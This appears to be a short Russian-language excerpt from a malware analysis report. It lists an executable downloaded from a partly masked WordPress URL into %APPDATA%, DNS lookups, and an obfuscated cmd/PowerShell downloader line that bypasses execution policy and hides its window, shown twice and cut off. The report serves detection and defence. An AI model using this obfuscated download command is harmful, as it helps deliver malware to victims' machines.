Техническая информация
- http://ne###ntech.com/wp-content/ay4te/mdp5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWers^HeL^l.exE -^EX^eC^u^tI^o^NPoLI^CY ^by^PasS -n^o^PROFiLe -WiNdOW^sT^yLE hIDdEN^ ^(^n^e^W-^obje^Ct sySt^e^m.N^E^T.WEBc^L^IE^n^t).^doW^nLo^a^D^F^ILe('http://ne###ntech.com/wp...
- %APPDATA%.exe
- 'ht##.#odhosting.net':80
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
- '<SYSTEM32>\cmd.exe' /C "POWers^HeL^l.exE -^EX^eC^u^tI^o^NPoLI^CY ^by^PasS -n^o^PROFiLe -WiNdOW^sT^yLE hIDdEN^ ^(^n^e^W-^obje^Ct sySt^e^m.N^E^T.WEBc^L^IE^n^t).^doW^nLo^a^D^F^ILe('http://ne###ntech.com/wp...' (со скрытым окном)